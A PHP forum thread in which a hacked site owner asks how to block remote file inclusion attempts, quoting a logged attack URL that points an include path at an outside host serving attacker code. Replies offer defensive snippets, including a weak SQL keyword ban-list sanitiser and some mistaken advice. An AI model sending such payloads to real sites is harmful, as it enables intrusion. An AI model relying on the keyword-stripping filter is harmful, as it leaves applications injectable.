Jump to content

Stopping a hack attempt - quickly

deansatch

By deansatch
in PHP Coding Help

 Share

Recommended Posts

deansatch Member

deansatch

Posted
Posted

I had recently had my site hacked and managed to clear it all up. I have been checking my logs and another attempt is being made on my site using injection via the url. They are visiting my site using things like:

 

http://mysite.com//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://test.bigshop.cz/uploaded/two??

 

If you look at http://test.bigshop.cz/uploaded/two?? and view the source you can see their php code.

 

Is there anything I can do to stop them even trying?

Link to comment
https://forums.phpfreaks.com/topic/189419-stopping-a-hack-attempt-quickly/
Share on other sites
deansatch Member

deansatch

Posted
  • Author
Posted

After my last successful hack, I disabled allow_url_include. I want to disable allow_url_fopen as well just to be safe, but I use file_get_contents on one part of a page. Is there a way I can just enable it for that script and disable it immediately after?

ShadowIce Member

ShadowIce

Posted
Posted

this will ban MOST BUT NOT ALL proxies

 

<?PHP

IF(ISSET($_SERVER['HTTP_X_FORWARDED_FOR']) || ($_SERVER['HTTP_USER_AGENT']=='') || ($_SERVER['HTTP_VIA']!='')){
        DIE("Proxy servers not allowed.");
}

$proxy_headers = ARRAY(   
     'HTTP_VIA',   
     'HTTP_X_FORWARDED_FOR',   
     'HTTP_FORWARDED_FOR',   
     'HTTP_X_FORWARDED',   
     'HTTP_FORWARDED',   
     'HTTP_CLIENT_IP',   
     'HTTP_FORWARDED_FOR_IP',   
     'VIA',   
     'X_FORWARDED_FOR',   
     'FORWARDED_FOR',   
     'X_FORWARDED',   
     'FORWARDED',   
     'CLIENT_IP',   
     'FORWARDED_FOR_IP',   
     'HTTP_PROXY_CONNECTION'   
        );
FOREACH($proxy_headers AS $x){
     IF (ISSET($_SERVER[$x])) DIE("You are using a proxy.");
        EXIT;
}

?>

 

this will stop him from flooding ur site:

 

<?PHP

IF (!ISSET($_SESSION)) {
    SESSION_START();
}
// anti flood protection
IF($_SESSION['last_session_request'] > TIME() - 2){
    // users will be redirected to this page if it makes requests faster than 2 seconds
    HEADER("location: /flood.html");
    EXIT;
}
$_SESSION['last_session_request'] = TIME();

?>

 

this will stop him from injection sql:

 

<?PHP
    FUNCTION anti_injection( $user, $pass ) {
           // We'll first get rid of any special characters using a simple regex statement.
           // After that, we'll get rid of any SQL command words using a string replacment.
            $banlist = ARRAY (
                    "insert", "select", "update", "delete", "distinct", "having", "truncate", "replace",
                    "handler", "like", " as ", "or ", "procedure", "limit", "order by", "group by", "asc", "desc"
            );
            // ---------------------------------------------
            IF ( EREGI ( "[a-zA-Z0-9]+", $user ) ) {
                    $user = TRIM ( STR_REPLACE ( $banlist, '', STRTOLOWER ( $user ) ) );
            } ELSE {
                    $user = NULL;
            }
            // ---------------------------------------------
            // Now to make sure the given password is an alphanumerical string
            // devoid of any special characters. strtolower() is being used
            // because unfortunately, str_ireplace() only works with PHP5.
            IF ( EREGI ( "[a-zA-Z0-9]+", $pass ) ) {
                    $pass = TRIM ( STR_REPLACE ( $banlist, '', STRTOLOWER ( $pass ) ) );
            } ELSE {
                    $pass = NULL;
            }
            // ---------------------------------------------
            // Now to make an array so we can dump these variables into the SQL query.
            // If either user or pass is NULL (because of inclusion of illegal characters),
            // the whole script will stop dead in its tracks.
            $array = ARRAY ( 'user' => $user, 'pass' => $pass );
            // ---------------------------------------------
            IF ( IN_ARRAY ( NULL, $array ) ) {
                    DIE ( 'Invalid use of login and/or password. Please use a normal method.' );
            } ELSE {
                    RETURN $array;
            }
    }
?>

 

this will filter alpha numeric characters:

 

<?PHP

//Begin filtering variable  $data of non alphanumeric characters

$data = PREG_REPLACE("/[^0-9a-zA-Z]/i", '', $data);

//Finish filtering of non alphanumeric characters

?>

gevensen Member

gevensen

Posted
Posted

if your index doesnt need $_GET you can also do something like

<?php

if(isset($_GET)){

// do whatever maybe return server error 500 contact admin and mimic a server problem so they get bored, redirect to the fbi website for fun or whatever creative thing you can do

//if you want you can ban each ip and put it on a blacklist or just simply die();

}

?>

deansatch Member

deansatch

Posted
  • Author
Posted

I'm assuming that a hacker doing these url type exploits is hoping to come across (with luck) an:

 

 if(isset($_GET['hack'])){
//something
}

sort of thing where they have site.com?hack=http://hackerscode.txt

I noticed a lot of the attempts were using ?page=something or ?pg=something etc...

 

I still have no idea how they managed to succeed the last time. But they managed to plant a couple of php files that wrote new code to my index file.

oni-kun Member

oni-kun

Posted
Posted

I'm assuming that a hacker doing these url type exploits is hoping to come across (with luck) an:

 

 if(isset($_GET['hack'])){
//something
}

sort of thing where they have site.com?hack=http://hackerscode.txt

I noticed a lot of the attempts were using ?page=something or ?pg=something etc...

 

I still have no idea how they managed to succeed the last time. But they managed to plant a couple of php files that wrote new code to my index file.

 

Then they were using a proposed exploit scanner, and succedded on one level. I added the site to MALZILLA/safebrowsing repo for update, sooner or later it will go through, But you should really fix the code or atleast show us the request that performed the malicious behaviour, Your site is obviously not secure.

 

use anti flood protection. use alphanumeric characters fix. DONT allow ur form to use GET. GET shows the user ur variables. use POST instead :)

 

Mhmm.. POST is not any more secure than GET.

 

oni-kun Member

oni-kun

Posted
Posted

at least it wont show variables.... -.-

 

<form action="page.php" method = post/get>
   <input type="foobar" id="baz"/>
</form>

 

Would you prefer to get the variable 'baz' from $_POST['baz'] or $_GET['baz']? In otherwords, you're wrong.

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.